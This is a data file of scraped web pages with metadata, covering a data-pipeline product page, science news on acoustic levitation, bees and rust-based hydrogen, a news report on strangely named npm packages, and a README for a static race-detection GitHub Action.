| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
12,127,574 |
https://rivery.io/
|
Cloud ELT Tool | Data Pipeline & Integration Platform - Rivery
| null |
# Make your data flow
## Rivery makes it easy to build end-to-end ELT data pipelines quickly. No-code or custom code, for analytics or AI: Rivery works for you.
## Rivery Copilot
## Ingest
Easily extract data from any app or database. Load it right into your data lake or cloud data warehouse via managed API and CDC replication in a few clicks.
## Transform
Turn raw data into business data models with SQL or Python. Automate your entire data integration process with advanced transformation workflows or our pre-built data model kits.
## Orchestrate
Control your data flow from start to finish. Efficiently manage dependencies between and within your pipelines with conditional logic, containers, loops, and advanced scheduling.
## Activate
Push data directly into your tech stack with reverse ETL. Enrich data in your CRM, send data insights to Slack, trigger a Tableau refresh, control any service API.
## Scale
Manage your DataOps with zero effort. Get a clear line of sight into all your pipeline activity and consumption. Add pipelines without any infrastructure setbacks. Instantly deploy between environments and roll back seamlessly between versions.
## Achieve more with less
### Accelerate
data delivery
Build advanced data pipelines in minutes. Deploy end-to-end data solutions with our starter kits.
7.5x
Faster time to value
### Simplify
your stack
Go from duct taping 3-4 tools to a complete SaaS platform. Cut overhead and data silo costs working from one place.
33%
Reduction in data-related costs
### Solve
complex use cases
Connect to all your data without pre-built integrations. Simply run advanced workflows or Python scripts.
50%
Less time spent on data processing
## Integrate with any data source
Award-winning support
Work with data you can trust
Top-rated ETL tool
| true | true | true |
Easily solve your most complex data pipeline challenges with Rivery’s fully-managed cloud ELT tool. Start a FREE trial now!
|
2024-10-12 00:00:00
|
2024-09-11 00:00:00
|
website
|
rivery.io
|
Rivery
| null | null |
|
33,614,509 |
https://planet.one/scene
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
7,023,117 |
http://www.npr.org/blogs/thetwo-way/2014/01/02/259148381/using-sound-to-levitate-objects-and-move-them-in-mid-air
|
Using Sound To Levitate Objects And Move Them Midair
|
Bill Chappell
|
# Using Sound To Levitate Objects And Move Them Midair
Researchers in Tokyo have put a new twist on the use of sound to suspend objects in air. They've used ultrasonic standing waves to trap pieces of wood, metal, and water – and even move them around.
Researchers have used sound to levitate objects in previous experiments, dating back decades. But that work has largely relied on speakers that were set up in a line to bounce sound waves off a hard surface.
The new experiment uses four speakers to surround an open square area that's about 21 inches wide. Four phased arrays use standing waves to create an ultrasonic focal point in that space, as the researchers explain in a video about their work.
That means that they generate a suspending force — which can then trap particles and objects in mid-air. The objects can be moved around by manipulating the waves.
The researchers' video shows several items being placed in the test area, from drops of water to small plastic and metal machine parts and a length of a wooden match measuring three centimeters.
The device uses sound at the frequency of 40 kHz — beyond the upper limits of human hearing at 20 kHz.
The University of Tokyo researchers' video, called Three-Dimensional Mid-Air Acoustic Manipulation [Acoustic Levitation], expands on a research article they submitted to arXiv, a science publishing site maintained by Cornell University, last month.
Here's how the researchers describe their work:
"Our manipulation system has two original features. One is the direction of the ultrasound beam, which is arbitrary because the force acting toward its center is also utilized. The other is the manipulation principle by which a localized standing wave is generated at an arbitrary position and moved three-dimensionally by opposed and ultrasonic phased arrays."
The Japanese researchers — Yoichi Ochiai, Takayuki Hoshi, and Jun Rekimoto — say they're looking at ways to manipulate larger objects. And it seems they also see their device as a potential option for moving items around in low-gravity environments, such as in space or orbit.
"It has not escaped our notice that our developed method for levitation under gravity suggests the possibility of developing a technology for handling objects under microgravity," they write.
The levitation techniques open another window into a potential future of manipulating devices — earlier today, Mark wrote about an MIT project that created a way to let people move items remotely within a workspace.
We first spotted the eye-catching video of their sound-levitation work at the tech site Hardware 360.
| true | true | true |
Researchers in Tokyo have put a new twist on the use of sound to suspend objects in air. They've used ultrasonic standing waves to trap pieces of wood, metal and water – and even move them around.
|
2024-10-12 00:00:00
|
2014-01-02 00:00:00
|
article
|
npr.org
|
NPR
| null | null |
|
12,442,172 |
http://news.nationalpost.com/features/how-edward-snowden-escaped-hong-kong
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
37,403,363 |
https://www.bleepingcomputer.com/news/technology/yes-theres-an-npm-package-called-env-and-some-others-like-it/
|
Yes, there's an npm package called @(-.-)/env and some others like it
|
Ax Sharma
|
Strangely named npm packages like -, @!-!/-, @(-.-)/env, and --hepl continue to exist on the internet's largest software registry.
While not all of these may necessarily pose an obvious security risk, some were named before npm enforced naming guidelines and could potentially break tooling.
My colleague and Sonatype senior software engineer Lex Vorona came across not one but several npm packages that do not strictly follow naming conventions, or have rather striking names.
"If you search for `@!-!/-`
on npmjs.com it will tell you there are no packages like this. But if you just put that into the URL you'll see that it is actually a package: https://www.npmjs.com/package/@!-!/-," Vorona shared with BleepingComputer.
Package names beginning with an "@" indicate that the package is scoped as the symbol is used to denote scopes, or namespaces on the npm registry.
For example, a company named "Example Inc." may choose to publish its npm packages "foo" and "bar" under its *@example* scope, making these packages appear as *@example/foo*, and *@example/bar *on npmjs.com*. *The forward slash (/) following the @ sign is used as a delimiter or separator between the scope and the package name.
That means, the package itself is called "-" but published under an oddly named scope "!-!" giving it a funky moniker altogether.
"There are also exist `@----/-`
and `@-)/utils`
which are also not searchable," Vorona further told us.
According to the npm security platform, Socket, @----/- is an empty package—containing no functional code other than the manifest, while @-)/utils is deprecated. @!-!/- contains minimal code.
The engineer compiled a list of several oddly named packages, some with scope names that included a text emoji:
@!!!!!/javascript
@!!!!!/mounted-to-dom
@!!!!!/polarbear
@!!!!!/require
@!!!!!/walk-up
@!!!!!/walk_up
@!-!/-
@!tach!/sgejs
@!vanilla/container
@(-.-)/application-error
@(-.-)/automaintainer
@(-.-)/env
@(-.-)/html
@(-.-)/result
@(-.-)/swagger-ui
@(._.)/execute
@(._.)/oooooo
@(~_~)/flex
@))/singleton
@-)/utils
@----/-
@-./db
@-0/amplify
@-0/browser
@-0/hdom
@-0/keys
@-0/spool
@-0/utils
## Package names or commands?
While not all of these packages might be malicious or pose a threat, these could certainly confuse or break software development tooling that is not accustomed to parsing packages with unconventional names.
In an exclusive report, BleepingComputer had previously shed light on an empty npm package "-" with more than 700,000 downloads.
The reason for this was hypothesized to be developers accidentally typing an extra hyphen ("-") in command line instructions, such as *npm i, *that would cause their npm client to download this empty package in addition to the package that they had intended to download.
Tactfully named packages like "--hepl" (as opposed to "--help") may achieve a similar effect given their typo-squatting potential.
BleepingComputer observed, as soon as "--hepl" is installed it displays the message, "You is pwnd" on the developer's console, making it a proof-of-concept (PoC) exercise. Not all packages might be this forgiving.
Although realistically, in most cases, providing "--hepl" as a command line argument may cause your tools to reject it as an invalid option and stop there.
Other examples of single-letter packages, or those resembling npm commands include, but aren't limited to: i, g, install, D, and s.
Starting in 2017, npm made revisions to its naming rules to thwart typosquats by disallowing use of both upper case letters in package names, and unscrupulous use of punctuation marks in an attempt to sneak in typosquats. But it may be more challenging to purge existing packages that were published prior to these rules coming into effect.
## Post a Comment Community Rules
## You need to login in order to post a comment
Not a member yet? Register Now
| true | true | true |
Strangely named npm packages like -, @!-!/-, @(-.-)/env, and --hepl continue to exist on the internet's largest software registry. While not all of these may necessarily pose an obvious security risk, some were named before npm enforced naming guidelines and could potentially break tooling.
|
2024-10-12 00:00:00
|
2023-09-02 00:00:00
|
article
|
bleepingcomputer.com
|
BleepingComputer
| null | null |
|
10,414,469 |
http://www.eurekalert.org/pub_releases/2015-10/uos-sas101915.php
|
Scents and sense ability: Diesel fumes alter half the flower smells bees need
| null |
In polluted environments, diesel fumes may be reducing the availability of almost half the most common flower odours that bees use to find their food, research has found.
The new findings suggest that toxic nitrous oxide (NOx) in diesel exhausts could be having an even greater effect on bees' ability to smell out flowers than was previously thought.
NOx is a poisonous pollutant produced by diesel engines which is harmful to humans, and has also previously been shown to confuse bees' sense of smell, which they rely on to sniff out their food.
Researchers from the University of Southampton and the University of Reading found that there is now evidence to show that, of the eleven most common single compounds in floral odours, five have can be chemically altered by exposure to NOx gases from exhaust fumes.
Lead author Dr Robbie Girling, from the University of Reading's Centre for Agri-Environmental Research (formerly of University of Southampton), said: "Bees are worth millions to the British economy alone, but we know they have been in decline worldwide.
"We don't think that air pollution from diesel vehicles is the main reason for this decline, but our latest work suggests that it may have a worse effect on the flower odours needed by bees than we initially thought.
"People rely on bees and pollinating insects for a large proportion of our food, yet humans have paid the bees back with habitat destruction, insecticides, climate change and air pollution.
"This work highlights that pollution from dirty vehicles is not only dangerous to people's health, but could also have an impact on our natural environment and the economy."
Co-author Professor Guy Poppy, from Biological Sciences at the University of Southampton, said: "It is becoming clear that bees are at risk from a range of stresses from neonicitinoid insecticides through to varroa mites. Our research highlights that a further stress could be the increasing amounts of vehicle emissions affecting air quality. Whilst it is unlikely that these emissions by themselves could be affecting bee populations, combined with the other stresses, it could be the tipping point."
###
This latest research is part of continuing studies into the effects of air pollution on bees. Previous work in 2013 found that bees in the lab could be confused by the effects of diesel pollution. Dr Girling and Dr Tracey Newman from the University of Southampton are currently studying how diesel fumes may have direct effects on the bees themselves.
The work is published in the *Journal of Chemical Ecology* and was funded by the Leverhulme Trust.
#### Journal
Journal of Chemical Ecology
| true | true | true |
In polluted environments, diesel fumes may be reducing the availability of almost half the most common flower odours that bees use to find their food, research has found.
|
2024-10-12 00:00:00
|
2015-10-19 00:00:00
|
https://earimediaprodweb.azurewebsites.net/Api/v1/Multimedia/f06a02fb-fbb7-4c8a-b0a6-1214df74401f/Rendition/thumbnail/Content/Public
|
website
|
eurekalert.org
|
EurekAlert!
| null | null |
6,010,961 |
http://www.bbc.co.uk/news/science-environment-23226798
|
Rust promises hydrogen power boost
|
Simon Redfern
|
# Rust promises hydrogen power boost
- Published
**Rust could help boost the efficiency of hydrogen production from sunlight - a potentially green source of energy.**
Tiny (nano-sized) particles of haematite (crystalline iron oxide, or rust) have been shown to split water into hydrogen and oxygen in the presence of solar energy.
The result could bring the goal of generating cheap hydrogen from sunlight and water a step closer to reality.
Details are published in the journal Nature Materials.
Researchers from Switzerland, the US and Israel identified what they termed "champion nanoparticles" of haematite, which are a few billionths of a metre in size.
Bubbles of hydrogen gas appear spontaneously when the tiny grains of haematite are put into water under sunlight as part of a photoelectrochemical cell (PEC).
The nanostructures look like minuscule cauliflowers, and they are grown as a layer on top of an electrode.
The key to the improvement lies in understanding how electrons inside the haematite crystals interact with the edges of grains within these "champions"
Where the particle is correctly oriented and contains no grain boundaries, electrons pass along efficiently.
This allows water splitting to take place that leads to the capture of about 15% of the energy in the incident sunlight - that which falls on a set area for a set length of time. This energy can then be stored in the form of hydrogen.
Identifying the champion nanoparticles allowed Scott Warren and Michael Graetzel from the University of Lausanne, Switzerland, to master the methods for increasing the effectiveness of their prototype cell.
Iron oxide is cheap, and the electrodes used to create abundant, environmentally-friendly hydrogen from water in this photochemical method should be inexpensive and relatively efficient.
The hydrogen made from water and sunlight in this way could then be stored, transported, and sold on for subsequent energy needs in fuel cells or simply by burning.
Commenting on the research, Dr Chin Kin Ong, from the department of chemical engineering at Imperial College London told BBC News the research could yield material that was "cheap, earth-abundant and efficient at photon-to-electron-to hydrogen energy conversion".
- Published28 February 2013
- Published20 September 2011
- Published15 August 2011
| true | true | true |
A discovery by an international team of scientists could help boost the efficiency of hydrogen production from the Sun's rays - a potentially green source of energy.
|
2024-10-12 00:00:00
|
2013-07-08 00:00:00
|
article
|
bbc.com
|
BBC News
| null | null |
|
25,928,639 |
https://github.com/coderrect-inc/coderrect-github-action
|
GitHub - coderrect-inc/coderrect-github-action: Coderrect is a static analyzer for concurrent C/C++/Fortran programs to detect data-races/race-conditions/anti-patterns.
|
Coderrect-Inc
|
**GitHub Action for the Coderrect static race detection scanner**
The `coderrect-github-action`
runs static analysis in a GitHub workflow using Coderrect to automatically detect concurrency bugs in your code:
- Coderrect is an efficient and accurate static analysis solution to identify potential concurrency bugs in your multi-threaded software.
- Coderrect supports C/C++/Fortran code and common parallel programming interfaces including OpenMP, pthread, and C++ std::thread.
- Coderrect Github Action supports generating formatted HTML reports and hosting them on Coderrect cloud for users to review.
Documentation and examples are available at: Coderrect Action Documentation
More information about Coderrect Scanner is available at: Coderrect.com
If you are an experienced user of GitHub Action, you can easily integrate Coderrect to your workflow by adding the following to `.github/workflows/ci.yml`
:
```
# Add the following to "steps"
- name: Coderrect Scan
uses: coderrect-inc/coderrect-github-action@main
```
**Table of Contents**
Continuous Integration/Continuous Delivery (CI/CD) is a common practice now for developing software. In CI, typically tests and checks are run against every pull request and code commit to ensure the new code changes do not break anything or introduce new bugs. CI makes it easier to fix bugs quickly and often.
You can create custom CI/CD workflows directly in your GitHub repository with **GitHub Actions**.
In this tutorial, we take memcached as an example project to demonstrate how to set up GitHub Actions.
To start, you can click the “Action“ tab above your GitHub Repository.
Once you enter the Action tab, GitHub will guide you to create your own CI/CD script by providing different template scripts based on different building system.
Here you can select **“set up a workflow yourself“** to use the basic template.
GitHub will automatically create a YAML file (`main.yml`
by default) under ** .github/workflows** and this is the path which you should put your future scripts under. The left-hand side is the script editor and the right-hand side is the place you can search different existing Action scripts published in GitHub Marketplace.
The default template script looks similar as below, we will explain it in detail:
```
# This is a basic workflow to help you get started with Actions
name: CI
# Controls when the action will run.
on:
push:
branches: [ main ]
pull_request:
branches: [ main ]
# Allows you to run this workflow manually from the Actions tab
workflow_dispatch:
# Defines the workflow of this action.
jobs:
# This workflow contains a single job called "build"
build:
# The type of runner that the job will run on
runs-on: ubuntu-latest
# Steps represent a sequence of tasks that will be executed as part of the job
steps:
# Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
- uses: actions/checkout@v2
# Runs a single command using the runners shell
- name: Run a one-line script
run: echo Hello, world!
# Runs a set of commands using the runners shell
- name: Run a multi-line script
run: |
echo Add other actions to build,
echo test, and deploy your project.
```
The definition of an action consists of two major parts: `on`
and `jobs`
.
Field `on`
defines when this action will be triggered. The default template only triggers the action when there’s a push or pull request made upon the main branch.
For example, if you want the action to be triggered at any event on any branch, you can simply change the script to:
```
on: [push, pull_request]
```
If you only want to trigger actions manually, then you should specify `workflow_dispatch`
instead. This will create a button in the Action Tab for you to trigger them manually later. Check out this blog on how to manually trigger GitHub Actions.
Field `job`
defines the actual workflow of the action. The subfield `build`
is a customized job name, and you can change it to something more meaningful, such as `test-build-on-ubuntu`
.
`runs-on`
specifies the system image on which you want to run your CI/CD tasks.
`steps`
specifies the detailed sub-tasks performed in a job. You can compose your CI/CD job using the published Actions from GitHub Marketplace and your own customized scripts.
Take memcached as an example for integrating Coderrect. Check here for the final script.
In general, integrating Coderrect requires three steps:
```
steps:
# step 1
- uses: actions/checkout@v2
# step 2
- name: Install deps
run: |
sudo apt-get update -y
sudo apt-get install -y libevent-dev libseccomp-dev git libsasl2-dev
- name: Build
run: |
gcc --version
./autogen.sh
./configure --enable-seccomp --enable-tls --enable-sasl --enable-sasl-pwdb
make -j
# step 3
- name: coderrect scan
uses: coderrect-inc/coderrect-github-action@main
```
-
**Step1**: Check out your GitHub repository, using an action provided by GitHub. -
**Step2**: Installs all dependencies required for building the project (“Install deps”) and does a test build (“Build“).
Note that including task “Build“ is **not required** for Coderrect to function, but it’s critical to make sure your project can successfully build before applying Coderrect.
**Step3**: Apply Coderrect to your project. You can search the GitHub Marketplace to obtain the most updated script and all available options.
Once this script is saved, the GitHub Action you just defined will be automatically triggered when you push new commits or merge pull requests. You can review them by entering the “Action“ tab.
To see Coderrect’s race detection report, you can click task “coderrect scan“ to expand its terminal output. Coderrect will output a list of summary for all executables it analyzes and also attach an report link at the end for you to view them in detail.
If you are using a different building system (e.g., CMake) or a different language or compiler, then you need to properly configure Coderrect. Here we provide instructions for some commonly used configurations.
You will need to install and setup `cmake`
first.
```
- name: download cmake
run: |
wget https://cmake.org/files/v3.18/cmake-3.18.2-Linux-x86_64.tar.gz
tar xf cmake-3.18.2-Linux-x86_64.tar.gz
mkdir build && cd build
../cmake-3.18.2-Linux-x86_64/bin/cmake ..
```
Since we are building the project under the `build`
directory instead of the root path.
We will also need to specify the build directory for Coderrect.
```
- name: Coderrect Scan
uses: coderrect-inc/[email protected]
with:
buildPath: "build"
```
For more details, take a look at this cmake project to learn how to integrate Coderrect into more complex projects
You will need to install the fortran compiler first. For example:
```
- name: Install fortran
run: |
sudo apt-get update -y
sudo apt-get install -y gfortran
```
Then it is likely that you need to specify the fortran compiler when you use `make`
. If so, you should also pass the full compilation command to Coderrect. (`gcc`
is pre-installed in the Github Action environment.)
```
- name: coderrect scan
uses: coderrect-inc/[email protected]
with:
buildCommand: "make COMPILER=GNU MPI_COMPILER=gfortran C_MPI_COMPILER=gcc"
```
For more details, take a look at this Fortran project to learn how to integrate Coderrect into more complex projects
Coderrect allows you to provide a configuration file to fully customize your analysis.
In order to do so, check our documentation to see available configurations. Once you write a configuration file (say `coderrect.json`
). You can pass it to the scanner as below:
```
- name: coderrect scan
uses: coderrect-inc/[email protected]
with:
options: "-analyzeAllBinaries -conf=/path/to/coderrect.json"
```
The path should be **a relative path from your build directory** (e.g., if your build directory is `./build/`
and your config file is under the root path, then you should specify the config file as `"-conf=../coderrect.json"`
).
Inputs are the set of fields you can configure to customized the behavior of Coderrect Gtihub Action.
`buildCommand`
- Default:
`"make -j"`
- Description: The command to build your project. For example, the command to build your whole project might be
`make all`
instead of`make`
.
- Default:
`cleanCommand`
- Default:
`"make clean || true"`
- Description: The command to clean your previous build. Coderrect needs to capture the building process for analysis, therefore if you have done a test build before applying Coderrect, we need to clean your test build first.
- Default:
`buildPath`
- Default:
`"."`
(the root path of your project) - Description: The relative path for your cmake project's build directory.
- Default:
`options`
- Default:
`"-analyzeAllBinaries"`
- Description: The command line options for Coderrect Scanner. Check the documentation for all supported options.
- Default:
`exit0`
- Default: false
- Description: By default, Coderrect will exit with 1 if any race is detected, thus your following CI/CD workflow will be blocked. Set this to true if you want CI/CD to proceed after Coderrect no matter what.
Copyright 2020 Coderrect Inc.
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
```
http://www.apache.org/licenses/LICENSE-2.0
```
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
| true | true | true |
Coderrect is a static analyzer for concurrent C/C++/Fortran programs to detect data-races/race-conditions/anti-patterns. - coderrect-inc/coderrect-github-action
|
2024-10-12 00:00:00
|
2020-12-02 00:00:00
|
https://repository-images.githubusercontent.com/317742957/f0cb3000-6020-11eb-98bf-6fe50c59e8df
|
object
|
github.com
|
GitHub
| null | null |
8,045,373 |
http://www.theguardian.com/science/2014/jul/13/laboratory-grown-beef-meat-without-murder-hunger-climate-change
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
16,826,919 |
https://lemire.me/blog/2018/04/12/for-greater-speed-try-batching-your-out-of-cache-data-accesses/
| null | null | null | true | false | false | null | null | null | null | null | null | null | null | null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.